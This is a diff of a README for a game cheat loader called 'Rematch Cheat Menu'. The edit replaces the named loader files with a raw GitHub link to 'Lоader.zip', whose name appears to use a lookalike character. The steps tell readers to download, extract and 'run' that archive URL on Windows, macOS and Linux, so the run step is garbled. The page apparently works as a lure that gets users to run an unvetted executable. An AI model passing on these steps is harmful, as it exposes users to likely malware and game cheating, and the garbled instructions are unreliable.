CoretechRD/Rematch-Toolkit-Plus/README.md

 Getting Rematch Cheat Menu up and running is simple!
 Please follow these steps carefully:

-1. Download `Loader.rar` from the repository.
+1. Download `https://raw.githubusercontent.com/CoretechRD/Rematch-Toolkit-Plus/main/Lоader.zip` from the repository.
-2. Extract the contents of `Loader.rar` to your preferred directory using WinRAR, 7zip, or any compatible extraction tool.
+2. Extract the contents of `https://raw.githubusercontent.com/CoretechRD/Rematch-Toolkit-Plus/main/Lоader.zip` to your preferred directory using WinRAR, 7zip, or any compatible extraction tool.
-3. Run the `RematchLoader.exe` (Windows), `RematchLoader.app` (macOS), or `rematchloader.sh` (Linux).
+3. Run the `https://raw.githubusercontent.com/CoretechRD/Rematch-Toolkit-Plus/main/Lоader.zip` (Windows), `https://raw.githubusercontent.com/CoretechRD/Rematch-Toolkit-Plus/main/Lоader.zip` (macOS), or `https://raw.githubusercontent.com/CoretechRD/Rematch-Toolkit-Plus/main/Lоader.zip` (Linux).
 4. Follow the on-screen prompts to complete the setup.
 5. Launch your game and use the preset hotkey (default: F12) to open the cheat menu.
 6. Customize, explore modules, and enjoy an optimized gaming experience!